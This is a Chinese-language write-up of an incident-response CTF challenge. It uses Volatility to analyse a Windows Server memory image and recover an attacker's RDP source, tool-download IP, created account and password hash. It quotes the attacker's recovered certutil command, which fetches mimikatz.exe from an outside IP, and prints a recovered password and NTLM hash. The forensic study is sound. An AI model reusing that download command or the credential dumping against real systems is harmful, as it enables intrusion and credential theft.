内存镜像分析实战:破解攻击者入侵路径

admin
admin
admin
140497
文章
117
评论
2025年5月13日12:25:13评论6 views字数 2062阅读6分52秒阅读模式
 

题目信息

题目资源

题目来源:第一届Solar应急响应比赛

题目文件:SERVER-2008-20241220-162057

背景 & 题目

  1. 请找到rdp连接的跳板地址 --- flag格式 flag{1.1.1.1}
  2. 请找到攻击者下载黑客工具的IP地址 --- flag格式 flag{1.1.1.1}
  3. 攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么 --- flag格式 flag{xxxx}
  4. 请找到攻击者创建的用户 --- flag格式 flag{xxxx}
  5. 请找到攻击者利用跳板rdp登录的时间 --- flag格式 flag{2024/01/01 00:00:00}
  6. 请找到攻击者创建的用户的密码哈希值 --- flag格式 flag{XXXX}

解题过程

flag1

请找到rdp连接的跳板地址

volatility

附件是raw原始文件,先通过volatility进行分析

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64

内存镜像分析实战:破解攻击者入侵路径
mem00

我们需要找到rdp(3389 Port)链接的相关信息,通过netscan命令查看网络链接情况

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 netscan

内存镜像分析实战:破解攻击者入侵路径
mem01

本地通过运行了svchost.exe建立了对3389端口的监听,远程IP 192.168.60.220:34121连接本地的3389端口

flag{192.168.60.220}

flag2

请找到攻击者下载黑客工具的IP地址

这个肯定也要看网络链接,可以在上面的网络扫描的结果中一个一个尝试

或者直接使用

下载黑客工具 => 命令 ->  cmdcsan

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 cmdscan

内存镜像分析实战:破解攻击者入侵路径
mem02

certutil -urlcache -split -f http://155.94.204.67:85/mimikatz.exe C:WindowsTempmi.exe

  • certutil是Windows系统自带的,可用于远程下载文件
flag{155.94.204.67}

flag3

攻击者获取的“FusionManager节点操作系统帐户(业务帐户)”的密码是什么

内存镜像分析实战:破解攻击者入侵路径
mem02

看到这里面有一个命令type pass.txt -> 查看pass.txt的内容 -> 这里多半就是密码

所以就是找到文件偏移,然后导出文件进行查看

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | findstr pass

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007e4cedd0 --dump-dir=./

  • dumpfiles -> 导出
  • -Q:接文件偏移( 通过filescan得出的 )
  • --dump-dir:导出的目录
内存镜像分析实战:破解攻击者入侵路径
mem03
内存镜像分析实战:破解攻击者入侵路径
mem04
flag{GalaxManager_2012}

flag4

请找到攻击者创建的用户

法1 - hashdump

通过hashdump命令 导出本地所有用户的哈希值

内存镜像分析实战:破解攻击者入侵路径
mem05

法2 - 导出security.evtx分析

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 filescan | findstr Security

内存镜像分析实战:破解攻击者入侵路径
mem06

volatility_2.6_win64_standalone.exe -f SERVER-2008-20241220-162057.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007e744ba0 --dump-dir=./

修改后缀为evtx,打开,可能是导出的原因有些损坏( 无法直接筛选事件ID )

手动查找4720的事件ID进行查看

4720: 用户账户已创建

内存镜像分析实战:破解攻击者入侵路径
mem07
flag{ASP.NET}

flag5

请找到攻击者利用跳板rdp登录的时间

查找4624事件ID,一个一个排查就行

内存镜像分析实战:破解攻击者入侵路径
mem08
flag{2024/12/21 00:15:34}

flag6

请找到攻击者创建的用户的密码哈希值

这个在之前得到的hashdump就出现过

内存镜像分析实战:破解攻击者入侵路径
mem05
flag{5ffe97489cbec1e08d0c6339ec39416d}

 

原文始发于微信公众号(夜风Sec):内存镜像分析实战:破解攻击者入侵路径,全程可复现!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月13日12:25:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内存镜像分析实战:破解攻击者入侵路径https://cn-sec.com/archives/4058452.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息